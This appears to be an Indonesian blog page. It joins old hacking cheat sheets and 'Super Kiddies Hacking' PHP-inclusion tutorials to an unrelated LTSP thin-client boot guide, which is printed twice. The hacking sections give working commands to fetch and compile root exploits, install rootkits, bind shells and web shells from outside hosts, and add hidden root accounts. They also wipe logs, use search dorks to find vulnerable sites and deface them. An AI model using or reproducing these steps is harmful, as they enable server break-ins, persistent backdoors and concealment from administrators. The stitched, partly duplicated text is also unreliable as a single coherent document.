gunzip ftp.tgz gzip ftp.tar tar -zxvf ftp.tar.gz cd ftp ./scan 163 22 10 ./scan 163 22 10 163 ================================================ scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
================================================ http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
================================================ ================================================ find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd ”
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” ”
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
================================================ +Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan - ./apache IPTarget (Mis: ./apache 202.11159.67.176) ================================== +Command MassApache - ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan - ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176) ================================================ +FTP Command 4 RooT - ./scan No Depan IP Target (Mis: ./scannn 210 21 10) =addUser= uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, buat password ketik passwd kuntua enter , abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita Changing password for user ganjen passwd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd bash -u 0 -d / abis itu ketik lagi passwd -d bash apus jejak cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog
udah di ketik semua ? udahh… tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
—————–
Patch Your Root
—————–
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
——————-
Add user dlm Root:
——————-
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
—————————-
**add user accses root
—————————-
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
———–
Del User
———–
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
—————–
——————————————–
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
——————————————–
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH ./r00t 203.20 -d 2 <— scan massal FTP ./r00t 203.20 -d 3 <— scan massal FTP ./r00t 134.7. -d 4 ——————————————– ngeROOT utk OS SCO : wget www.renjana.com/sco ./sco IP ——————————————– pasang BackDoor: 1. id uname -a cd /tmp wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz ls -al tar -zxvf tk.tgz cd tk ./t0rn kuntua 7000 ——————————————– LINKS: http://www.eviltime.com/download/exploit www.cahcepu.net www.vibrasi.net www.paktani.tk www.sisilainrevolt.org www.sitiung.com www.utay-doyan.cc www.atstake.com/research/redirect.html?users/10pht/nc110.tgz ======= Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (defaulllt = 300) -c connectback ip address -C max childs for scan/bruttteforce mode (default = 40) -d bruteforce/scanmode delaaay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode CONTOH: [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) ————————————————————– + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows … + [192.168.0.133] Samba ./sambal -b 0 -v =========== Usage: ./mayday-linux -t [-pa] -t target The host to attack. -a password Default password is “chaaangeme”. -p port Default port is 8001. ================ /usr/sbin/adduser httpd passwd httpd ============ PACTH SAMBA = root@redeye samba]# /etc/init.d/smb stop = Shutting down SMB services: [ OK ] = Shutting down NMB services: [ OK ] = [root@redeye root]# cd /etc/samba = [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs = [root@redeye samba]# /etc/init.d/smb start ======================= ======= VHOST = edit di httpd.conf = tinggal tambah no = kong di named.conf = 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz = 2. tar zxvf apache_1.3.27.tar.gz = 3. cd apache_1.3.27 = 4. ./configure = 5. make = 6. make install = 7. /usr/local/apache/bin/apachectl start = cd /usr/local/apache/conf/httpd.conf = contoh = echo “” > httpd.conf
= echo “ServerName www.Cmaster4.net” > httpd.conf
= echo “DocumentRoot /home/iptek/public_html” > httpd.conf
= echo “ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin” > httpd.conf
= echo “” >> httpd.conf
= ——————————
= ——————————
= ——————————
= find |grep name.conf
= echo “zone “i-am.Cmaster4.net” IN {” > named.conf
= echo “type master; > named.conf
= echo “file “/var/named/named.local”;” > named.conf
= echo “allow-update { none; };” > named.conf
= echo “};” >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik “/usr/sbin/httpd -DHAVE_PROXY -DHAVE” ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <———ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget kalo bisa… buka: http://www.target.org/modules/My_eGallery/public/mail.php ======== pasang bindtty wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ============ cgi-telnet mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder …/www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <——td kan kita ada di folder ini http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk kliatan cgi-bin-nya cd ke folder cgi-bin baru wget ke situ Contoh: wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl kalo bisa lanjut ke chmod 755 /home/users/russisk/cgi-bin/cgi.pl <——-agar file cgi.pl nya jd file eksekusi kalo bisa tinggal buka: www.target.org/cgi-bin/cgi.pl port 7788 ============ end wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz cd .psy ./config KuNTuA 6669 ./fuck ./run =========== Tittle : SUPER KIDDIES HACKING: “PHP SUPER BUGS” Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com ——————————————————————————————————– Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again 1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”. keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 2. allinurl content bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “ url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “ 3.eksekusi file httpd tadi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “ 4. buka telnet ke IP target sesuai dg port bindttynya II. install Cgi-telnet 1.buat url seperti ini : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “ url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya. 2. buat cgi-telnet test.pl jadi file eksekusi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “ 3. akses cgitelnet kita dengan membuka url : ” http://www.target.com/cgi-bin/test.pl “ masukkan passwordnya “n0fr13″ III. install shell php 1. buat url seperti ini : “http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “ url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita. 2. akses shell php kita sesuai dengan foldernya : ” http://www.target.com/target/log.php “ IV. Deface http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!!
Denpasar, 15 january 2004
K-159
Epilog :special thx to my beloved sister “May” for all the spirit, motivations, love, kindness, and all the fire that u give to me.”I love U my dear sister, in the name of Allah”.
bacaan lebih lanjut:
——————–
www.geocities.com/emilroni/hackurl.txt
www.geocities.com/emilroni/google.txt
=======================
=========================================================================================
Title :SUPER KIDDIES HACKING “Super Bugs PHP II”
Author :K-159
Greetz :KuNTuA, Lieur-Euy, pe_es.
Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================
Proof of Concept :
==================
kesalahan url pada fopen ( ) function sehingga attacker bisa menginjeksikan script ke server target.
Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
==========================================================================================
1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt
9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt
Details Exploit:
==========================================================================================
Upload a file : upload file ke server target
Explore with fopen() function : mencari target yang mengandung fopen pada server target
Execute arbitrary PHP functions : membuat script php ke dalam server target
Execute a system() command : menjalankan command unix/linux di server target
Manager for SQL Server : mengubah settingan data base sql server target
System overviewer (get the root !) : mengintip system server target dan melakukan lokal root
[REPOST] – Thin Client LTSP – Solusi Booting Harddisk
LTSP
Posting ini adalah postingan lama yang di publikasikan pertama kali pada tahun 2006 dan masih relevan untuk topik thin client.
Mengaplikasikan LTSP memang menarik. Ide memanfaatkan komputer-komputer tua*) agar bisa berjalan dengan kecepatan komputer baru. Namun ada satu sisi halangan yang cukup mengganggu, yaitu tidak semua komputer tua dilengkapi dengan rom boot atau PXE dan terus terang, walaupun mudah mendownload ROM Image dari http://www.rom-o-matic.net namun sulit mendapatkan eeprom writer untuk menulis rom image tersebut ke chip rom.
Untuk mengatasi hal ini kita bisa melakukan booting via floppy atau hard disk, caranya dengan mendownload Floppy bootable rom image (*.zdsk) kemudian masukkan floppy disk yang sudah diformat ke drive dan ketik perintah:
$ cat nama-image-rom.zdsk > /dev/fd0
atau jika anda menggunakan DOS/Windows gunakan program RAWRITE untuk menuliskan rom boot image ke floppy disk.
Tapi menggunakan floppy pun ternyata masih ada problem tersendiri, yaitu hanya cocok pada saat percobaan dan tidak cocok untuk kondisi operasional sebab floppy disk dan floppy drive mudah rusak. Sehingga pilihan berikutnya adalah booting melalui harddisk. Untuk booting melalui harddisk ada beberapa hal yang harus di siapkan:
• Koneksi Internet
• LTSP Server ( tentu saja )
• Thin Client dengan harddisk dan cd-drive
• Damn Small Linux (DSL) LiveCd
catatan:
CD-Drive diperlukan hanya pada saat men-setup client saja, jika sudah selesai cd-drive bisa dilepas lagi dari thin client tersebut.
Mulailah dengan membooting DSL via cd-drive, saya biasanya sekaligus mencoba apakah perangkat seperti NIC, harddisk, dan VGA Card berfungsi dengan baik. Jika semuanya normal, jalankan terminal dan persiapkan harddisk dengan menuliskan “0″ pada sector pertama pada harddisk dengan perintah:
# sudo su
# dd if=/dev/zero of=/dev/hda bs=1M count=5
menggunakan tool “cfdisk”, partisi ulang harddisk tersebut. Kita hanya membutuhkan sebuah partisi sebesar 40kb setelah di partisi, format harddisk tersebut dengan perintah:
# mke2fs /dev/hda1
kemudian kaitkan partisi
# mkdir -p /mnt/hda1
# mount /dev/hda1 /mnt/hda1
Langkah berikut adalah mendownload LILO/GRUB/SYSLINUX loadable kernel format (.zlilo) dari http://www.rom-o-matic.net yang sesuai dengan NIC anda. Pada titik ini, sering terjadi kebingungan dalam memilih jenis rom boot image yang sesuai dengan NIC kita. Untuk mengetahui jenis NIC yang kita miliki bisa kita lakukan dengan memberikan perintah:
# lspci
perintah tersebut di komputer saya menghasilkan tampilan berikut:
…..
00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC’97 Modem Controller (rev 03)
01:01.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10)
01:02.0 Ethernet controller: Linksys, A Division of Cisco Systems [AirConn] INPROCOMM IPN 2220 Wireless LAN Adapter (rev 01)
…..
perhatikan baris bertuliskan Ethernet controller, menunjukkan tipe NIC saya adalah RTL-8139 namun bagaimana memilih dari 14 jenis RTL-8139 yang ada? caranya dengan mencari PCI ID dari NIC tersebut. untuk mengetahuinya berikan perintah:
# lspci -n
perintah tersebut menghasilkan tampilan di bawah:
……
00:1f.6 Class 0703: 8086:24c6 (rev 03)
01:01.0 Class 0200: 10ec:8139 (rev 10)
01:02.0 Class 0200: 17fe:2220
…..
pada baris kedua, perhatikan angka hex 10ec:8139, inilah PCI ID dari NIC yang kita butuhkan. sehingga rom boot image yang kita ambil adalah: rtl8139:rtl8139 — [0x10ec:0x8139], cara yang sama silahkan anda lakukan untuk NIC anda.
Setelah mendownload LILO/GRUB/SYSLINUX loadable kernel format (.zlilo), buatlah file lilo.conf di /mnt/hda1 yang isinya:
lba32
boot = /dev/hda
map = /mnt/hda1/.map
install = /mnt/hda1/boot-menu.b
image = /mnt/hda1/rom-image-yang-anda-download.zlilo
label=LTSP
kemudian lakukan perintah untuk menuliskan kode etherboot tersebut sebagai LILO image ke MBR dari harddisk:
# lilo -v -C /mnt/hda1/lilo.conf -s /mnt/hda1/backup
Setelah langkah ini silahkan restart untuk mencoba booting dari harddisk
Posting ini adalah postingan lama yang di publikasikan pertama kali pada tahun 2006 dan masih relevan untuk topik thin client.
Mengaplikasikan LTSP memang menarik. Ide memanfaatkan komputer-komputer tua*) agar bisa berjalan dengan kecepatan komputer baru. Namun ada satu sisi halangan yang cukup mengganggu, yaitu tidak semua komputer tua dilengkapi dengan rom boot atau PXE dan terus terang, walaupun mudah mendownload ROM Image dari http://www.rom-o-matic.net namun sulit mendapatkan eeprom writer untuk menulis rom image tersebut ke chip rom.
Untuk mengatasi hal ini kita bisa melakukan booting via floppy atau hard disk, caranya dengan mendownload Floppy bootable rom image (*.zdsk) kemudian masukkan floppy disk yang sudah diformat ke drive dan ketik perintah:
$ cat nama-image-rom.zdsk > /dev/fd0
atau jika anda menggunakan DOS/Windows gunakan program RAWRITE untuk menuliskan rom boot image ke floppy disk.
Tapi menggunakan floppy pun ternyata masih ada problem tersendiri, yaitu hanya cocok pada saat percobaan dan tidak cocok untuk kondisi operasional sebab floppy disk dan floppy drive mudah rusak. Sehingga pilihan berikutnya adalah booting melalui harddisk. Untuk booting melalui harddisk ada beberapa hal yang harus di siapkan:
• Koneksi Internet
• LTSP Server ( tentu saja )
• Thin Client dengan harddisk dan cd-drive
• Damn Small Linux (DSL) LiveCd
catatan:
CD-Drive diperlukan hanya pada saat men-setup client saja, jika sudah selesai cd-drive bisa dilepas lagi dari thin client tersebut.
Mulailah dengan membooting DSL via cd-drive, saya biasanya sekaligus mencoba apakah perangkat seperti NIC, harddisk, dan VGA Card berfungsi dengan baik. Jika semuanya normal, jalankan terminal dan persiapkan harddisk dengan menuliskan “0″ pada sector pertama pada harddisk dengan perintah:
# sudo su
# dd if=/dev/zero of=/dev/hda bs=1M count=5
menggunakan tool “cfdisk”, partisi ulang harddisk tersebut. Kita hanya membutuhkan sebuah partisi sebesar 40kb setelah di partisi, format harddisk tersebut dengan perintah:
# mke2fs /dev/hda1
kemudian kaitkan partisi
# mkdir -p /mnt/hda1
# mount /dev/hda1 /mnt/hda1
Langkah berikut adalah mendownload LILO/GRUB/SYSLINUX loadable kernel format (.zlilo) dari http://www.rom-o-matic.net yang sesuai dengan NIC anda. Pada titik ini, sering terjadi kebingungan dalam memilih jenis rom boot image yang sesuai dengan NIC kita. Untuk mengetahui jenis NIC yang kita miliki bisa kita lakukan dengan memberikan perintah:
# lspci
perintah tersebut di komputer saya menghasilkan tampilan berikut:
…..
00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC’97 Modem Controller (rev 03)
01:01.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10)
01:02.0 Ethernet controller: Linksys, A Division of Cisco Systems [AirConn] INPROCOMM IPN 2220 Wireless LAN Adapter (rev 01)
…..
perhatikan baris bertuliskan Ethernet controller, menunjukkan tipe NIC saya adalah RTL-8139 namun bagaimana memilih dari 14 jenis RTL-8139 yang ada? caranya dengan mencari PCI ID dari NIC tersebut. untuk mengetahuinya berikan perintah:
# lspci -n
perintah tersebut menghasilkan tampilan di bawah:
……
00:1f.6 Class 0703: 8086:24c6 (rev 03)
01:01.0 Class 0200: 10ec:8139 (rev 10)
01:02.0 Class 0200: 17fe:2220
…..
pada baris kedua, perhatikan angka hex 10ec:8139, inilah PCI ID dari NIC yang kita butuhkan. sehingga rom boot image yang kita ambil adalah: rtl8139:rtl8139 — [0x10ec:0x8139], cara yang sama silahkan anda lakukan untuk NIC anda.
Setelah mendownload LILO/GRUB/SYSLINUX loadable kernel format (.zlilo), buatlah file lilo.conf di /mnt/hda1 yang isinya:
lba32
boot = /dev/hda
map = /mnt/hda1/.map
install = /mnt/hda1/boot-menu.b
image = /mnt/hda1/rom-image-yang-anda-download.zlilo
label=LTSP
kemudian lakukan perintah untuk menuliskan kode etherboot tersebut sebagai LILO image ke MBR dari harddisk:
# lilo -v -C /mnt/hda1/lilo.conf -s /mnt/hda1/backup
Setelah langkah ini silahkan restart untuk mencoba booting dari harddisk
Subscribe to:
Posts (Atom)
